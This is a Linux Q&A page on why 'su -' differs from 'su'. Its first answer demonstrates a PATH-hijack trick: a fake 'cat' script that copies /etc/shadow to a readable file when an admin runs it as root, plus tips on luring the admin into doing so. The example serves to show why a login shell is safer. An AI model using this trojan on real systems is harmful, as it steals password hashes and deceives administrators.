Why do we use su - and not just su?

su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.

su just switches the user, providing a normal shell with an environment nearly the same as with the old user.

Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.

$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"

Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work! 

$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!

If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:

$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit

Wow! Thanks, super admin!

$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy

He, he.

You maybe noticed that the corrupted $PATH variable was not reset. This wouldn't have happened, if the admin invoked su - instead.


su - logs you in completely as root, whereas su makes it so you are pretending to be root.

The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.

Depending on your system, it may also mean differences in prompt, PATH, or history file.

So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.

On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.

Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.


The main difference is :

su - username sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,

su username just starts a shell with current environment settings for the specified user.

If username is not specified with su and su -, the root account is implied as default.

Tags:

Linux

Permissions

Su

Conventions

Recent Posts